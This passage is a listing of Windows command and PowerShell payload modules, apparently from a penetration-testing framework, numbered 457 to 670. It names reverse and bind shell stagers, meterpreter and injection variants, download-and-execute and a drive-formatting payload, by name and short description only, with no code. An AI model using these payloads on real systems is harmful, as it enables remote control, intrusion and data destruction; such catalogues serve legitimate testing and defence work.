   457   payload/cmd/windows/https/x64/vncinject/reverse_tcp_rc4                                     normal  No     HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   458   payload/cmd/windows/https/x64/vncinject/reverse_tcp_uuid                                    normal  No     HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)
   459   payload/cmd/windows/https/x64/vncinject/reverse_winhttp                                     normal  No     HTTPS Fetch, Windows x64 Reverse HTTP Stager (winhttp)
   460   payload/cmd/windows/https/x64/vncinject/reverse_winhttps                                    normal  No     HTTPS Fetch, Windows x64 Reverse HTTPS Stager (winhttp)
   461   payload/cmd/windows/jjs_reverse_tcp                                                         normal  No     Windows Shell, Reverse TCP (via jjs)
   462   payload/cmd/windows/powershell/adduser                                                      normal  No     Powershell Exec
   463   payload/cmd/windows/powershell/custom/bind_hidden_ipknock_tcp                               normal  No     Powershell Exec, Windows shellcode stage, Hidden Bind Ipknock TCP Stager
   464   payload/cmd/windows/powershell/custom/bind_hidden_tcp                                       normal  No     Powershell Exec, Windows shellcode stage, Hidden Bind TCP Stager
   465   payload/cmd/windows/powershell/custom/bind_ipv6_tcp                                         normal  No     Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)
   466   payload/cmd/windows/powershell/custom/bind_ipv6_tcp_uuid                                    normal  No     Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   467   payload/cmd/windows/powershell/custom/bind_named_pipe                                       normal  No     Powershell Exec, Windows shellcode stage, Windows x86 Bind Named Pipe Stager
   468   payload/cmd/windows/powershell/custom/bind_nonx_tcp                                         normal  No     Powershell Exec, Windows shellcode stage, Bind TCP Stager (No NX or Win7)
   469   payload/cmd/windows/powershell/custom/bind_tcp                                              normal  No     Powershell Exec, Windows shellcode stage, Bind TCP Stager (Windows x86)
   470   payload/cmd/windows/powershell/custom/bind_tcp_rc4                                          normal  No     Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   471   payload/cmd/windows/powershell/custom/bind_tcp_uuid                                         normal  No     Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)
   472   payload/cmd/windows/powershell/custom/find_tag                                              normal  No     Powershell Exec, Windows shellcode stage, Find Tag Ordinal Stager
   473   payload/cmd/windows/powershell/custom/reverse_hop_http                                      normal  No     Powershell Exec, Windows shellcode stage, Reverse Hop HTTP/HTTPS Stager
   474   payload/cmd/windows/powershell/custom/reverse_http                                          normal  No     Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (wininet)
   475   payload/cmd/windows/powershell/custom/reverse_http_proxy_pstore                             normal  No     Powershell Exec, Windows shellcode stage, Reverse HTTP Stager Proxy
   476   payload/cmd/windows/powershell/custom/reverse_https                                         normal  No     Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)
   477   payload/cmd/windows/powershell/custom/reverse_https_proxy                                   normal  No     Powershell Exec, Windows shellcode stage, Reverse HTTPS Stager with Support for Custom Proxy
   478   payload/cmd/windows/powershell/custom/reverse_ipv6_tcp                                      normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager (IPv6)
   479   payload/cmd/windows/powershell/custom/reverse_named_pipe                                    normal  No     Powershell Exec, Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager
   480   payload/cmd/windows/powershell/custom/reverse_nonx_tcp                                      normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager (No NX or Win7)
   481   payload/cmd/windows/powershell/custom/reverse_ord_tcp                                       normal  No     Powershell Exec, Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)
   482   payload/cmd/windows/powershell/custom/reverse_tcp                                           normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager
   483   payload/cmd/windows/powershell/custom/reverse_tcp_allports                                  normal  No     Powershell Exec, Windows shellcode stage, Reverse All-Port TCP Stager
   484   payload/cmd/windows/powershell/custom/reverse_tcp_dns                                       normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager (DNS)
   485   payload/cmd/windows/powershell/custom/reverse_tcp_rc4                                       normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   486   payload/cmd/windows/powershell/custom/reverse_tcp_rc4_dns                                   normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   487   payload/cmd/windows/powershell/custom/reverse_tcp_uuid                                      normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support
   488   payload/cmd/windows/powershell/custom/reverse_udp                                           normal  No     Powershell Exec, Windows shellcode stage, Reverse UDP Stager with UUID Support
   489   payload/cmd/windows/powershell/custom/reverse_winhttp                                       normal  No     Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)
   490   payload/cmd/windows/powershell/custom/reverse_winhttps                                      normal  No     Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)
   491   payload/cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp                            normal  No     Powershell Exec, Hidden Bind Ipknock TCP Stager
   492   payload/cmd/windows/powershell/dllinject/bind_hidden_tcp                                    normal  No     Powershell Exec, Hidden Bind TCP Stager
   493   payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp                                      normal  No     Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
   494   payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid                                 normal  No     Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   495   payload/cmd/windows/powershell/dllinject/bind_named_pipe                                    normal  No     Powershell Exec, Windows x86 Bind Named Pipe Stager
   496   payload/cmd/windows/powershell/dllinject/bind_nonx_tcp                                      normal  No     Powershell Exec, Bind TCP Stager (No NX or Win7)
   497   payload/cmd/windows/powershell/dllinject/bind_tcp                                           normal  No     Powershell Exec, Bind TCP Stager (Windows x86)
   498   payload/cmd/windows/powershell/dllinject/bind_tcp_rc4                                       normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   499   payload/cmd/windows/powershell/dllinject/bind_tcp_uuid                                      normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
   500   payload/cmd/windows/powershell/dllinject/find_tag                                           normal  No     Powershell Exec, Find Tag Ordinal Stager
   501   payload/cmd/windows/powershell/dllinject/reverse_hop_http                                   normal  No     Powershell Exec, Reverse Hop HTTP/HTTPS Stager
   502   payload/cmd/windows/powershell/dllinject/reverse_http                                       normal  No     Powershell Exec, Windows Reverse HTTP Stager (wininet)
   503   payload/cmd/windows/powershell/dllinject/reverse_http_proxy_pstore                          normal  No     Powershell Exec, Reverse HTTP Stager Proxy
   504   payload/cmd/windows/powershell/dllinject/reverse_ipv6_tcp                                   normal  No     Powershell Exec, Reverse TCP Stager (IPv6)
   505   payload/cmd/windows/powershell/dllinject/reverse_nonx_tcp                                   normal  No     Powershell Exec, Reverse TCP Stager (No NX or Win7)
   506   payload/cmd/windows/powershell/dllinject/reverse_ord_tcp                                    normal  No     Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
   507   payload/cmd/windows/powershell/dllinject/reverse_tcp                                        normal  No     Powershell Exec, Reverse TCP Stager
   508   payload/cmd/windows/powershell/dllinject/reverse_tcp_allports                               normal  No     Powershell Exec, Reverse All-Port TCP Stager
   509   payload/cmd/windows/powershell/dllinject/reverse_tcp_dns                                    normal  No     Powershell Exec, Reverse TCP Stager (DNS)
   510   payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4                                    normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   511   payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns                                normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   512   payload/cmd/windows/powershell/dllinject/reverse_tcp_uuid                                   normal  No     Powershell Exec, Reverse TCP Stager with UUID Support
   513   payload/cmd/windows/powershell/dllinject/reverse_winhttp                                    normal  No     Powershell Exec, Windows Reverse HTTP Stager (winhttp)
   514   payload/cmd/windows/powershell/dns_txt_query_exec                                           normal  No     Powershell Exec, DNS TXT Record Payload Download and Execution
   515   payload/cmd/windows/powershell/download_exec                                                normal  No     Powershell Exec, Windows Executable Download (http,https,ftp) and Execute
   516   payload/cmd/windows/powershell/encrypted_shell/reverse_tcp                                  normal  No     Powershell Exec, Windows Command Shell, Encrypted Reverse TCP Stager
   517   payload/cmd/windows/powershell/exec                                                         normal  No     Powershell Exec
   518   payload/cmd/windows/powershell/format_all_drives                                            manual  No     Powershell Exec
   519   payload/cmd/windows/powershell/generic/debug_trap                                           normal  No     Powershell Exec, Generic x86 Debug Trap
   520   payload/cmd/windows/powershell/generic/tight_loop                                           normal  No     Powershell Exec, Generic x86 Tight Loop
   521   payload/cmd/windows/powershell/loadlibrary                                                  normal  No     Powershell Exec
   522   payload/cmd/windows/powershell/messagebox                                                   normal  No     Powershell Exec, Windows MessageBox
   523   payload/cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp                          normal  No     Powershell Exec, Hidden Bind Ipknock TCP Stager
   524   payload/cmd/windows/powershell/meterpreter/bind_hidden_tcp                                  normal  No     Powershell Exec, Hidden Bind TCP Stager
   525   payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp                                    normal  No     Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
   526   payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid                               normal  No     Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   527   payload/cmd/windows/powershell/meterpreter/bind_named_pipe                                  normal  No     Powershell Exec, Windows x86 Bind Named Pipe Stager
   528   payload/cmd/windows/powershell/meterpreter/bind_nonx_tcp                                    normal  No     Powershell Exec, Bind TCP Stager (No NX or Win7)
   529   payload/cmd/windows/powershell/meterpreter/bind_tcp                                         normal  No     Powershell Exec, Bind TCP Stager (Windows x86)
   530   payload/cmd/windows/powershell/meterpreter/bind_tcp_rc4                                     normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   531   payload/cmd/windows/powershell/meterpreter/bind_tcp_uuid                                    normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
   532   payload/cmd/windows/powershell/meterpreter/find_tag                                         normal  No     Powershell Exec, Find Tag Ordinal Stager
   533   payload/cmd/windows/powershell/meterpreter/reverse_hop_http                                 normal  No     Powershell Exec, Reverse Hop HTTP/HTTPS Stager
   534   payload/cmd/windows/powershell/meterpreter/reverse_http                                     normal  No     Powershell Exec, Windows Reverse HTTP Stager (wininet)
   535   payload/cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore                        normal  No     Powershell Exec, Reverse HTTP Stager Proxy
   536   payload/cmd/windows/powershell/meterpreter/reverse_https                                    normal  No     Powershell Exec, Windows Reverse HTTPS Stager (wininet)
   537   payload/cmd/windows/powershell/meterpreter/reverse_https_proxy                              normal  No     Powershell Exec, Reverse HTTPS Stager with Support for Custom Proxy
   538   payload/cmd/windows/powershell/meterpreter/reverse_ipv6_tcp                                 normal  No     Powershell Exec, Reverse TCP Stager (IPv6)
   539   payload/cmd/windows/powershell/meterpreter/reverse_named_pipe                               normal  No     Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager
   540   payload/cmd/windows/powershell/meterpreter/reverse_nonx_tcp                                 normal  No     Powershell Exec, Reverse TCP Stager (No NX or Win7)
   541   payload/cmd/windows/powershell/meterpreter/reverse_ord_tcp                                  normal  No     Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
   542   payload/cmd/windows/powershell/meterpreter/reverse_tcp                                      normal  No     Powershell Exec, Reverse TCP Stager
   543   payload/cmd/windows/powershell/meterpreter/reverse_tcp_allports                             normal  No     Powershell Exec, Reverse All-Port TCP Stager
   544   payload/cmd/windows/powershell/meterpreter/reverse_tcp_dns                                  normal  No     Powershell Exec, Reverse TCP Stager (DNS)
   545   payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4                                  normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   546   payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns                              normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   547   payload/cmd/windows/powershell/meterpreter/reverse_tcp_uuid                                 normal  No     Powershell Exec, Reverse TCP Stager with UUID Support
   548   payload/cmd/windows/powershell/meterpreter/reverse_winhttp                                  normal  No     Powershell Exec, Windows Reverse HTTP Stager (winhttp)
   549   payload/cmd/windows/powershell/meterpreter/reverse_winhttps                                 normal  No     Powershell Exec, Windows Reverse HTTPS Stager (winhttp)
   550   payload/cmd/windows/powershell/metsvc_bind_tcp                                              normal  No     Powershell Exec, Windows Meterpreter Service, Bind TCP
   551   payload/cmd/windows/powershell/metsvc_reverse_tcp                                           normal  No     Powershell Exec, Windows Meterpreter Service, Reverse TCP Inline
   552   payload/cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp                     normal  No     Powershell Exec, Hidden Bind Ipknock TCP Stager
   553   payload/cmd/windows/powershell/patchupdllinject/bind_hidden_tcp                             normal  No     Powershell Exec, Hidden Bind TCP Stager
   554   payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp                               normal  No     Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
   555   payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid                          normal  No     Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   556   payload/cmd/windows/powershell/patchupdllinject/bind_named_pipe                             normal  No     Powershell Exec, Windows x86 Bind Named Pipe Stager
   557   payload/cmd/windows/powershell/patchupdllinject/bind_nonx_tcp                               normal  No     Powershell Exec, Bind TCP Stager (No NX or Win7)
   558   payload/cmd/windows/powershell/patchupdllinject/bind_tcp                                    normal  No     Powershell Exec, Bind TCP Stager (Windows x86)
   559   payload/cmd/windows/powershell/patchupdllinject/bind_tcp_rc4                                normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   560   payload/cmd/windows/powershell/patchupdllinject/bind_tcp_uuid                               normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
   561   payload/cmd/windows/powershell/patchupdllinject/find_tag                                    normal  No     Powershell Exec, Find Tag Ordinal Stager
   562   payload/cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp                            normal  No     Powershell Exec, Reverse TCP Stager (IPv6)
   563   payload/cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp                            normal  No     Powershell Exec, Reverse TCP Stager (No NX or Win7)
   564   payload/cmd/windows/powershell/patchupdllinject/reverse_ord_tcp                             normal  No     Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
   565   payload/cmd/windows/powershell/patchupdllinject/reverse_tcp                                 normal  No     Powershell Exec, Reverse TCP Stager
   566   payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_allports                        normal  No     Powershell Exec, Reverse All-Port TCP Stager
   567   payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_dns                             normal  No     Powershell Exec, Reverse TCP Stager (DNS)
   568   payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4                             normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   569   payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns                         normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   570   payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid                            normal  No     Powershell Exec, Reverse TCP Stager with UUID Support
   571   payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  No     Powershell Exec, Hidden Bind Ipknock TCP Stager
   572   payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp                           normal  No     Powershell Exec, Hidden Bind TCP Stager
   573   payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp                             normal  No     Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
   574   payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  No     Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   575   payload/cmd/windows/powershell/patchupmeterpreter/bind_named_pipe                           normal  No     Powershell Exec, Windows x86 Bind Named Pipe Stager
   576   payload/cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp                             normal  No     Powershell Exec, Bind TCP Stager (No NX or Win7)
   577   payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp                                  normal  No     Powershell Exec, Bind TCP Stager (Windows x86)
   578   payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4                              normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   579   payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid                             normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
   580   payload/cmd/windows/powershell/patchupmeterpreter/find_tag                                  normal  No     Powershell Exec, Find Tag Ordinal Stager
   581   payload/cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp                          normal  No     Powershell Exec, Reverse TCP Stager (IPv6)
   582   payload/cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp                          normal  No     Powershell Exec, Reverse TCP Stager (No NX or Win7)
   583   payload/cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp                           normal  No     Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
   584   payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp                               normal  No     Powershell Exec, Reverse TCP Stager
   585   payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports                      normal  No     Powershell Exec, Reverse All-Port TCP Stager
   586   payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns                           normal  No     Powershell Exec, Reverse TCP Stager (DNS)
   587   payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4                           normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   588   payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns                       normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   589   payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid                          normal  No     Powershell Exec, Reverse TCP Stager with UUID Support
   590   payload/cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp                             normal  No     Powershell Exec, Hidden Bind Ipknock TCP Stager
   591   payload/cmd/windows/powershell/peinject/bind_hidden_tcp                                     normal  No     Powershell Exec, Hidden Bind TCP Stager
   592   payload/cmd/windows/powershell/peinject/bind_ipv6_tcp                                       normal  No     Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
   593   payload/cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid                                  normal  No     Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   594   payload/cmd/windows/powershell/peinject/bind_named_pipe                                     normal  No     Powershell Exec, Windows x86 Bind Named Pipe Stager
   595   payload/cmd/windows/powershell/peinject/bind_nonx_tcp                                       normal  No     Powershell Exec, Bind TCP Stager (No NX or Win7)
   596   payload/cmd/windows/powershell/peinject/bind_tcp                                            normal  No     Powershell Exec, Bind TCP Stager (Windows x86)
   597   payload/cmd/windows/powershell/peinject/bind_tcp_rc4                                        normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   598   payload/cmd/windows/powershell/peinject/bind_tcp_uuid                                       normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
   599   payload/cmd/windows/powershell/peinject/find_tag                                            normal  No     Powershell Exec, Find Tag Ordinal Stager
   600   payload/cmd/windows/powershell/peinject/reverse_ipv6_tcp                                    normal  No     Powershell Exec, Reverse TCP Stager (IPv6)
   601   payload/cmd/windows/powershell/peinject/reverse_named_pipe                                  normal  No     Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager
   602   payload/cmd/windows/powershell/peinject/reverse_nonx_tcp                                    normal  No     Powershell Exec, Reverse TCP Stager (No NX or Win7)
   603   payload/cmd/windows/powershell/peinject/reverse_ord_tcp                                     normal  No     Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
   604   payload/cmd/windows/powershell/peinject/reverse_tcp                                         normal  No     Powershell Exec, Reverse TCP Stager
   605   payload/cmd/windows/powershell/peinject/reverse_tcp_allports                                normal  No     Powershell Exec, Reverse All-Port TCP Stager
   606   payload/cmd/windows/powershell/peinject/reverse_tcp_dns                                     normal  No     Powershell Exec, Reverse TCP Stager (DNS)
   607   payload/cmd/windows/powershell/peinject/reverse_tcp_rc4                                     normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   608   payload/cmd/windows/powershell/peinject/reverse_tcp_rc4_dns                                 normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   609   payload/cmd/windows/powershell/peinject/reverse_tcp_uuid                                    normal  No     Powershell Exec, Reverse TCP Stager with UUID Support
   610   payload/cmd/windows/powershell/pingback_bind_tcp                                            normal  No     Powershell Exec, Windows x86 Pingback, Bind TCP Inline
   611   payload/cmd/windows/powershell/pingback_reverse_tcp                                         normal  No     Powershell Exec, Windows x86 Pingback, Reverse TCP Inline
   612   payload/cmd/windows/powershell/powershell_bind_tcp                                          normal  No     Powershell Exec
   613   payload/cmd/windows/powershell/powershell_reverse_tcp                                       normal  No     Powershell Exec
   614   payload/cmd/windows/powershell/powershell_reverse_tcp_ssl                                   normal  No     Powershell Exec
   615   payload/cmd/windows/powershell/shell/bind_hidden_ipknock_tcp                                normal  No     Powershell Exec, Windows Command Shell, Hidden Bind Ipknock TCP Stager
   616   payload/cmd/windows/powershell/shell/bind_hidden_tcp                                        normal  No     Powershell Exec, Windows Command Shell, Hidden Bind TCP Stager
   617   payload/cmd/windows/powershell/shell/bind_ipv6_tcp                                          normal  No     Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
   618   payload/cmd/windows/powershell/shell/bind_ipv6_tcp_uuid                                     normal  No     Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   619   payload/cmd/windows/powershell/shell/bind_named_pipe                                        normal  No     Powershell Exec, Windows Command Shell, Windows x86 Bind Named Pipe Stager
   620   payload/cmd/windows/powershell/shell/bind_nonx_tcp                                          normal  No     Powershell Exec, Windows Command Shell, Bind TCP Stager (No NX or Win7)
   621   payload/cmd/windows/powershell/shell/bind_tcp                                               normal  No     Powershell Exec, Windows Command Shell, Bind TCP Stager (Windows x86)
   622   payload/cmd/windows/powershell/shell/bind_tcp_rc4                                           normal  No     Powershell Exec, Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   623   payload/cmd/windows/powershell/shell/bind_tcp_uuid                                          normal  No     Powershell Exec, Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
   624   payload/cmd/windows/powershell/shell/find_tag                                               normal  No     Powershell Exec, Windows Command Shell, Find Tag Ordinal Stager
   625   payload/cmd/windows/powershell/shell/reverse_ipv6_tcp                                       normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Stager (IPv6)
   626   payload/cmd/windows/powershell/shell/reverse_nonx_tcp                                       normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   627   payload/cmd/windows/powershell/shell/reverse_ord_tcp                                        normal  No     Powershell Exec, Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   628   payload/cmd/windows/powershell/shell/reverse_tcp                                            normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Stager
   629   payload/cmd/windows/powershell/shell/reverse_tcp_allports                                   normal  No     Powershell Exec, Windows Command Shell, Reverse All-Port TCP Stager
   630   payload/cmd/windows/powershell/shell/reverse_tcp_dns                                        normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Stager (DNS)
   631   payload/cmd/windows/powershell/shell/reverse_tcp_rc4                                        normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   632   payload/cmd/windows/powershell/shell/reverse_tcp_rc4_dns                                    normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   633   payload/cmd/windows/powershell/shell/reverse_tcp_uuid                                       normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Stager with UUID Support
   634   payload/cmd/windows/powershell/shell/reverse_udp                                            normal  No     Powershell Exec, Windows Command Shell, Reverse UDP Stager with UUID Support
   635   payload/cmd/windows/powershell/shell_bind_tcp                                               normal  No     Powershell Exec, Windows Command Shell, Bind TCP Inline
   636   payload/cmd/windows/powershell/shell_bind_tcp_xpfw                                          normal  No     Powershell Exec, Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   637   payload/cmd/windows/powershell/shell_hidden_bind_tcp                                        normal  No     Powershell Exec, Windows Command Shell, Hidden Bind TCP Inline
   638   payload/cmd/windows/powershell/shell_reverse_tcp                                            normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Inline
   639   payload/cmd/windows/powershell/speak_pwned                                                  normal  No     Powershell Exec
   640   payload/cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp                               normal  No     Powershell Exec, Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
   641   payload/cmd/windows/powershell/upexec/bind_hidden_tcp                                       normal  No     Powershell Exec, Windows Upload/Execute, Hidden Bind TCP Stager
   642   payload/cmd/windows/powershell/upexec/bind_ipv6_tcp                                         normal  No     Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
   643   payload/cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid                                    normal  No     Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   644   payload/cmd/windows/powershell/upexec/bind_named_pipe                                       normal  No     Powershell Exec, Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
   645   payload/cmd/windows/powershell/upexec/bind_nonx_tcp                                         normal  No     Powershell Exec, Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   646   payload/cmd/windows/powershell/upexec/bind_tcp                                              normal  No     Powershell Exec, Windows Upload/Execute, Bind TCP Stager (Windows x86)
   647   payload/cmd/windows/powershell/upexec/bind_tcp_rc4                                          normal  No     Powershell Exec, Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   648   payload/cmd/windows/powershell/upexec/bind_tcp_uuid                                         normal  No     Powershell Exec, Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
   649   payload/cmd/windows/powershell/upexec/find_tag                                              normal  No     Powershell Exec, Windows Upload/Execute, Find Tag Ordinal Stager
   650   payload/cmd/windows/powershell/upexec/reverse_ipv6_tcp                                      normal  No     Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (IPv6)
   651   payload/cmd/windows/powershell/upexec/reverse_nonx_tcp                                      normal  No     Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   652   payload/cmd/windows/powershell/upexec/reverse_ord_tcp                                       normal  No     Powershell Exec, Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   653   payload/cmd/windows/powershell/upexec/reverse_tcp                                           normal  No     Powershell Exec, Windows Upload/Execute, Reverse TCP Stager
   654   payload/cmd/windows/powershell/upexec/reverse_tcp_allports                                  normal  No     Powershell Exec, Windows Upload/Execute, Reverse All-Port TCP Stager
   655   payload/cmd/windows/powershell/upexec/reverse_tcp_dns                                       normal  No     Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (DNS)
   656   payload/cmd/windows/powershell/upexec/reverse_tcp_rc4                                       normal  No     Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   657   payload/cmd/windows/powershell/upexec/reverse_tcp_rc4_dns                                   normal  No     Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   658   payload/cmd/windows/powershell/upexec/reverse_tcp_uuid                                      normal  No     Powershell Exec, Windows Upload/Execute, Reverse TCP Stager with UUID Support
   659   payload/cmd/windows/powershell/upexec/reverse_udp                                           normal  No     Powershell Exec, Windows Upload/Execute, Reverse UDP Stager with UUID Support
   660   payload/cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp                            normal  No     Powershell Exec, Hidden Bind Ipknock TCP Stager
   661   payload/cmd/windows/powershell/vncinject/bind_hidden_tcp                                    normal  No     Powershell Exec, Hidden Bind TCP Stager
   662   payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp                                      normal  No     Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
   663   payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid                                 normal  No     Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   664   payload/cmd/windows/powershell/vncinject/bind_named_pipe                                    normal  No     Powershell Exec, Windows x86 Bind Named Pipe Stager
   665   payload/cmd/windows/powershell/vncinject/bind_nonx_tcp                                      normal  No     Powershell Exec, Bind TCP Stager (No NX or Win7)
   666   payload/cmd/windows/powershell/vncinject/bind_tcp                                           normal  No     Powershell Exec, Bind TCP Stager (Windows x86)
   667   payload/cmd/windows/powershell/vncinject/bind_tcp_rc4                                       normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   668   payload/cmd/windows/powershell/vncinject/bind_tcp_uuid                                      normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
   669   payload/cmd/windows/powershell/vncinject/find_tag                                           normal  No     Powershell Exec, Find Tag Ordinal Stager
   670   payload/cmd/windows/powershell/vncinject/reverse_hop_http                                   normal  No     Powershell Exec, Reverse Hop HTTP/HTTPS Stager
